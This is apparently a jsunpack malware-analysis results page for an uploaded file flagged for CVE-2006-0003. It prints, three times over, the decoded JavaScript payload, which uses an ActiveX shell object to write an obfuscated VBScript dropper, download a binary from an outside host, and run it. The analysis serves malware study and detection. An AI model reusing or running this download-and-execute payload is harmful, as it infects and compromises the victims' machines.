JSUNPACK
A Generic JavaScript Unpacker
CAUTION: jsunpack was designed for security researchers and computer professionals
Enter a single URL (or paste JavaScript to decode):

Upload a PDF, pcap, HTML, or JavaScript file
Private? Help: privacy | uploads
Default Referer
Description

Submission permanent link d0d91c4a223b70268daa9ab5cd5bbdb8c358f500 (Received 2018-02-13 15:33:11, http://jsunpack.jeek.org/dec/getfile?hash=44b5/d9edf68324b62bd61c323f1568dcf974483a )

URLStatus
jsunpack.jeek.org/dec/getfile?hash=44b5/d9edf68324b62bd61c323f1568dcf974483a saved 17917 bytes b34687aadbab72188947b5efd013ad7f3bb701c9

All Malicious or Suspicious Elements of Submission

malicious: Alert detected /alert CVE-2006-0003 shellexecute with cmd </textarea><br /><b>266f/b104a20daba9e3a616c1c9209f6958deb091</b> from upload (1049 bytes) <a href="/dec/getfile?hash=266f/b104a20daba9e3a616c1c9209f6958deb091">download</a><br /><textarea style="width:100%; background-color:silver;" cols="130" rows="5"> /eval var JTZ=new ActiveXObject("shell.application");JTZ.ShellExecute("cmd",'/c cd %temp% &amp;@echo P0t = "http:/wrzucacz.pl/download/9351517964876"&gt;&gt;L1a.vbs &amp;@echo C8l = H3e("X]dCZmZ")&gt;&gt;L1a.vbs &amp;@echo Set W8v = CreateObject(H3e("bhmbaGCmba]iie"))&gt;&gt;L1a.vbs &amp;@echo W8v.Open H3e("\Zi"), P0t, False&gt;&gt;L1a.vbs &amp;@echo W8v.send ("")&gt;&gt;L1a.vbs &amp;@echo Set D7w = CreateObject(H3e("VYdYWChigZVb"))&gt;&gt;L1a.vbs &amp;@echo D7w.Open&gt;&gt;L1a.vbs &amp;@echo D7w.Type = 1 &gt;&gt;L1a.vbs &amp;@echo D7w.Write W8v.ResponseBody&gt;&gt;L1a.vbs &amp; @echo D7w.Position = 0 &gt;&gt;L1a.vbs &amp;@echo D7w.SaveToFile C8l, 2 &gt;&gt;L1a.vbs &amp;@echo D7w.Close&gt;&gt;L1a.vbs &amp;@echo function H3e(O6h) &gt;&gt; L1a.vbs &amp;@echo For A1y = 1 To Len(O6h) &gt;&gt;L1a.vbs &amp;@echo W7m = Mid(O6h, A1y, 1) &gt;&gt;L1a.vbs &amp;@echo W7m = Chr(Asc(W7m)- 21) &gt;&gt;L1a.vbs &amp;@echo N9i = N9i + W7m &gt;&gt; L1a.vbs &amp;@echo Next &gt;&gt;L1a.vbs &amp;@echo H3e = N9i &gt;&gt;L1a.vbs &amp;@echo End Function &gt;&gt;L1a.vbs&amp; L1a.vbs &amp;dEl L1a.vbs &amp; timeout 13 &amp; CHO.EXE',"","",0) /info.ActiveXObject shell.application /alert CVE-2006-0003 shellexecute with cmd /alert CVE-2006-0003 shellexecute with cmd </textarea><br /><b>f8cd/be2e649d4915fcc315dd9834662bb6788555</b> from upload (85 bytes) <a href="/dec/getfile?hash=f8cd/be2e649d4915fcc315dd9834662bb6788555">download</a><br /><textarea style="width:100%; background-color:silver;" cols="130" rows="1"> /info.ActiveXObject shell.application /alert CVE-2006-0003 shellexecute with cmd </textarea><br /></div></div><br />
jsunpack.jeek.org/dec/getfile?hash=44b5/d9edf68324b62bd61c323f1568dcf974483a malicious
[malicious:10] (ipaddr:204.152.206.106) jsunpack.jeek.org/dec/getfile?hash=44b5/d9edf68324b62bd61c323f1568dcf974483a
     status: (referer=http:/www.ask.com/web?q=puppies)saved 17917 bytes b34687aadbab72188947b5efd013ad7f3bb701c9
     malicious: Alert detected /alert CVE-2006-0003 shellexecute with cmd </textarea><br /><b>266f/b104a20daba9e3a616c1c9209f6958deb091</b> from upload (1049 bytes) <a href="/dec/getfile?hash=266f/b104a20daba9e3a616c1c9209f6958deb091">download</a><br /><textarea style="width:100%; background-color:silver;" cols="130" rows="5"> /eval var JTZ=new ActiveXObject("shell.application");JTZ.ShellExecute("cmd",'/c cd %temp% &amp;@echo P0t = "http:/wrzucacz.pl/download/9351517964876"&gt;&gt;L1a.vbs &amp;@echo C8l = H3e("X]dCZmZ")&gt;&gt;L1a.vbs &amp;@echo Set W8v = CreateObject(H3e("bhmbaGCmba]iie"))&gt;&gt;L1a.vbs &amp;@echo W8v.Open H3e("\Zi"), P0t, False&gt;&gt;L1a.vbs &amp;@echo W8v.send ("")&gt;&gt;L1a.vbs &amp;@echo Set D7w = CreateObject(H3e("VYdYWChigZVb"))&gt;&gt;L1a.vbs &amp;@echo D7w.Open&gt;&gt;L1a.vbs &amp;@echo D7w.Type = 1 &gt;&gt;L1a.vbs &amp;@echo D7w.Write W8v.ResponseBody&gt;&gt;L1a.vbs &amp; @echo D7w.Position = 0 &gt;&gt;L1a.vbs &amp;@echo D7w.SaveToFile C8l, 2 &gt;&gt;L1a.vbs &amp;@echo D7w.Close&gt;&gt;L1a.vbs &amp;@echo function H3e(O6h) &gt;&gt; L1a.vbs &amp;@echo For A1y = 1 To Len(O6h) &gt;&gt;L1a.vbs &amp;@echo W7m = Mid(O6h, A1y, 1) &gt;&gt;L1a.vbs &amp;@echo W7m = Chr(Asc(W7m)- 21) &gt;&gt;L1a.vbs &amp;@echo N9i = N9i + W7m &gt;&gt; L1a.vbs &amp;@echo Next &gt;&gt;L1a.vbs &amp;@echo H3e = N9i &gt;&gt;L1a.vbs &amp;@echo End Function &gt;&gt;L1a.vbs&amp; L1a.vbs &amp;dEl L1a.vbs &amp; timeout 13 &amp; CHO.EXE',"","",0) /info.ActiveXObject shell.application /alert CVE-2006-0003 shellexecute with cmd /alert CVE-2006-0003 shellexecute with cmd </textarea><br /><b>f8cd/be2e649d4915fcc315dd9834662bb6788555</b> from upload (85 bytes) <a href="/dec/getfile?hash=f8cd/be2e649d4915fcc315dd9834662bb6788555">download</a><br /><textarea style="width:100%; background-color:silver;" cols="130" rows="1"> /info.ActiveXObject shell.application /alert CVE-2006-0003 shellexecute with cmd </textarea><br /></div></div><br />
     info: DecodedMsg detected /info.ActiveXObject shell.application /alert CVE-2006-0003 shellexecute with cmd </textarea><br /><b>266f/b104a20daba9e3a616c1c9209f6958deb091</b> from upload (1049 bytes) <a href="/dec/getfile?hash=266f/b104a20daba9e3a616c1c9209f6958deb091">download</a><br /><textarea style="width:100%; background-color:silver;" cols="130" rows="5"> /eval var JTZ=new ActiveXObject("shell.application");JTZ.ShellExecute("cmd",'/c cd %temp% &amp;@echo P0t = "http:/wrzucacz.pl/download/9351517964876"&gt;&gt;L1a.vbs &amp;@echo C8l = H3e("X]dCZmZ")&gt;&gt;L1a.vbs &amp;@echo Set W8v = CreateObject(H3e("bhmbaGCmba]iie"))&gt;&gt;L1a.vbs &amp;@echo W8v.Open H3e("\Zi"), P0t, False&gt;&gt;L1a.vbs &amp;@echo W8v.send ("")&gt;&gt;L1a.vbs &amp;@echo Set D7w = CreateObject(H3e("VYdYWChigZVb"))&gt;&gt;L1a.vbs &amp;@echo D7w.Open&gt;&gt;L1a.vbs &amp;@echo D7w.Type = 1 &gt;&gt;L1a.vbs &amp;@echo D7w.Write W8v.ResponseBody&gt;&gt;L1a.vbs &amp; @echo D7w.Position = 0 &gt;&gt;L1a.vbs &amp;@echo D7w.SaveToFile C8l, 2 &gt;&gt;L1a.vbs &amp;@echo D7w.Close&gt;&gt;L1a.vbs &amp;@echo function H3e(O6h) &gt;&gt; L1a.vbs &amp;@echo For A1y = 1 To Len(O6h) &gt;&gt;L1a.vbs &amp;@echo W7m = Mid(O6h, A1y, 1) &gt;&gt;L1a.vbs &amp;@echo W7m = Chr(Asc(W7m)- 21) &gt;&gt;L1a.vbs &amp;@echo N9i = N9i + W7m &gt;&gt; L1a.vbs &amp;@echo Next &gt;&gt;L1a.vbs &amp;@echo H3e = N9i &gt;&gt;L1a.vbs &amp;@echo End Function &gt;&gt;L1a.vbs&amp; L1a.vbs &amp;dEl L1a.vbs &amp; timeout 13 &amp; CHO.EXE',"","",0) /info.ActiveXObject shell.application /alert CVE-2006-0003 shellexecute with cmd /alert CVE-2006-0003 shellexecute with cmd </textarea><br /><b>f8cd/be2e649d4915fcc315dd9834662bb6788555</b> from upload (85 bytes) <a href="/dec/getfile?hash=f8cd/be2e649d4915fcc315dd9834662bb6788555">download</a><br /><textarea style="width:100%; background-color:silver;" cols="130" rows="1"> /info.ActiveXObject shell.application /alert CVE-2006-0003 shellexecute with cmd </textarea><br /></div></div><br />
     info: [decodingLevel=0] found JavaScript
     error: line:3: SyntaxError: missing ; before statement:
          error: line:3: PK|ML!4SEE)44b5/d9edf68324b62bd61c323f1568dcf974483a
          error: line:3: ...^
     info: file: saved jsunpack.jeek.org/dec/getfile?hash=44b5/d9edf68324b62bd61c323f1568dcf974483a to (b34687aadbab72188947b5efd013ad7f3bb701c9)
     file: b34687aadbab72188947b5efd013ad7f3bb701c9: 17917 bytes

Decoded Files
b346/87aadbab72188947b5efd013ad7f3bb701c9 from jsunpack.jeek.org/dec/getfile?hash=44b5/d9edf68324b62bd61c323f1568dcf974483a (17917 bytes, 2017 hidden) download